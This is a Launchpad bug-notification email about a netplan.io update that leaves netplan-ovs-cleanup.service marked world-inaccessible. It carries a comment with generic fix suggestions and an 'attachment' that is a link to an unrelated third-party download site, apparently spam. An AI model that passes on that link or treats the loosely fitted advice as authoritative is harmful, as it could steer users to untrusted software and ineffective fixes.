The systemd warning started appearing after the netplan.io package update, indicating that the netplan-ovs-cleanup.service file is marked as world-inaccessible. However, systemd clarifies that this has no functional impact since the configuration remains accessible via its APIs. This behavior was not present before the update and is observed on both Ubuntu 22.04 LTS and Ubuntu 24.04 LTS, likely due to recent changes in Netplan's packaging. While the warning itself is harmless, you can try adjusting the file’s permissions using sudo chmod 644 /run/systemd/system/netplan-ovs-cleanup.service and then reloading systemd with sudo systemctl daemon-reload. If the warning persists after a reboot, consider rolling back to the previous Netplan version using sudo apt install netplan.io=0.105-0ubuntu2~22.04.3 or reporting it as a potential bug on Launchpad or Netplan’s GitHub.
** Attachment added: "https://bloxstrapdl.com/" https://bloxstrapdl.com/ -- You received this bug notification because you are a member of Ubuntu Bugs, which is subscribed to Ubuntu. https://bugs.launchpad.net/bugs/2072486 Title: netplan-ovs-cleanup.service is marked world-inaccessible To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/netplan.io/+bug/2072486/+subscriptions -- ubuntu-bugs mailing list ubuntu-bugs@lists.ubuntu.com https://lists.ubuntu.com/mailman/listinfo/ubuntu-bugs